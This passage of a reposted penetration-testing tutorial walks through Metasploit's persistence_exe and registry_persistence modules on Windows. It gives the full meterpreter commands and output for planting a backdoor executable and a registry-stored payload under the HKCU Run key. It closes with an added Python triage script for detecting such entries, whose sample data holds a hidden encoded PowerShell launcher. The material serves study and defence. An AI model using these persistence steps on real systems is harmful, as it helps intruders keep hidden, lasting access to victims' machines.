  the payload. Again requires privs.



Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to upload and execute.
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

This module uploads an executable to the remote host and makes it persistent. Four options are involved:

  • REXENAME is the file name the executable gets on the target
  • REXEPATH is the local path of the backdoor to upload (for example an exe built with msfvenom as in section 3)
  • SESSION is the session to run the module on
  • STARTUP is the startup type, one of USER, SYSTEM or SERVICE. USER starts at user logon (HKCU Run key, no special privileges needed), SYSTEM starts at system boot (needs privileges), SERVICE creates a service that starts the payload (needs privileges).

Trying it:

bash
meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER

[*] Running module against SAUCERMAN
[*] Reading Payload from file /home/ubuntu/shell.exe
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[+] Agent executed with PID 3684
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[*] Cleanup Meterpreter RC File: /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.1023/SAUCERMAN_20190612.1023.rc

4. registry_persistence

Full path: exploit/windows/local/registry_persistence

Similar to the first method, this module installs a payload into the registry's startup entries. The payload blob itself is stored as a value under a random key (HKCU\Software\0BaG3zDR below) and a Run key entry launches it at logon, so no file is written to disk. STARTUP=USER puts everything under HKCU and works without elevation; SYSTEM uses HKLM and requires it.

bash
meterpreter > background
[*] Backgrounding session 13...
msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > show options

Module options (exploit/windows/local/registry_persistence):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   BLOB_REG_KEY                    no        The registry key to use for storing the payload blob. (Default: random)
   BLOB_REG_NAME                   no        The name to use for storing the payload blob. (Default: random)
   CREATE_RC      true             no        Create a resource file for cleanup
   RUN_NAME                        no        The name to use for the 'Run' key. (Default: random)
   SESSION                         yes       The session to run this module on.
   SLEEP_TIME     0                no        Amount of time to sleep (in seconds) before executing payload. (Default: 0)
   STARTUP        USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/registry_persistence) > set SESSION 13
SESSION => 13
msf5 exploit(windows/local/registry_persistence) > run

[*] Generating payload blob..
[+] Generated payload, 6048 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\0BaG3zDR
[+] Installed payload blob to HKCU\Software\0BaG3zDR\iiEB4InD
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMPqA5kB
[*] Clean up Meterpreter RC file: /home/ubuntu/.msf4/logs/persistence/192.168.81.154_20190612.2138/192.168.81.154_20190612.2138.rc

Other modules of the same kind: exploit/windows/local/vss_persistence, exploit/windows/local/s4u_persistence.
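Every method in this section that does not need elevation ends up as a value under the user's Run key, with a random name and a command that either runs from the Temp directory or launches hidden PowerShell, and that is exactly what to look for when auditing or cleaning a host. The following added example (not part of the original post or of Metasploit) parses `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output and flags such entries. The sample output is constructed: the backdoor.exe entry mirrors the persistence_exe run above, the `SMPqA5kB` value is a hypothetical hidden-PowerShell launcher (the page does not show the real command registry_persistence writes), and the OneDrive line is a typical benign entry. The name-randomness test is a weak heuristic and is only reported alongside the stronger signals.

```python
import re

# Constructed sample of `reg query HKCU\...\Run` output (not captured from a real host).
# OneDrive: a typical benign entry. mEMZDQOxkkeebI: the value persistence_exe wrote above.
# SMPqA5kB: hypothetical data for the registry_persistence value (assumed shape, not the real blob).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\TideSec\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    mEMZDQOxkkeebI    REG_SZ    C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
    SMPqA5kB    REG_SZ    %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgAIAAoAE4A
"""

# reg query prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data
_VALUE = re.compile(r'^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$')
_TEMP = re.compile(r'(\\AppData\\Local\\Temp\\|%TEMP%|%TMP%|\\Windows\\Temp\\)', re.I)
_PS_HIDDEN = re.compile(
    r'powershell(\.exe)?.*?(\s-(w|windowstyle)\s+hidden|\s-(e|enc|encodedcommand)\s|\s-nop\b)', re.I)


def _random_looking(name):
    """Heuristic for Rex-style random names: many upper/lower flips and a high share of capitals."""
    letters = [c for c in name if c.isalpha()]
    if len(name) < 8 or len(letters) < 6:
        return False
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    upper_share = sum(1 for c in letters if c.isupper()) / len(letters)
    return flips >= 3 and upper_share >= 0.3


def parse_reg_query(text):
    """Yield (key, value_name, value_type, data) tuples from `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith('HKEY_'):
            key = line.strip()      # a key header line precedes its values
            continue
        m = _VALUE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2), m.group(3)


def triage_run_keys(text):
    """Return {value_name: [reasons]} for Run entries that deserve a closer look."""
    findings = {}
    for _key, name, _type, data in parse_reg_query(text):
        reasons = []
        if _TEMP.search(data):
            reasons.append('launches from a Temp directory')
        if _PS_HIDDEN.search(data):
            reasons.append('hidden or encoded PowerShell')
        if _random_looking(name):
            reasons.append('random-looking value name')
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == '__main__':
    for name, reasons in triage_run_keys(SAMPLE_REG_QUERY).items():
        print('%-16s %s' % (name, '; '.join(reasons)))
```

On a real host, feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM key for the SYSTEM variants). For the registry_persistence case, the Run value is only the launcher; the blob it reads lives under the separate random key printed by the module, so remove both, which is what the module's cleanup RC file does.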

References

Reposted from: https://saucer-man.com/information_security/79.html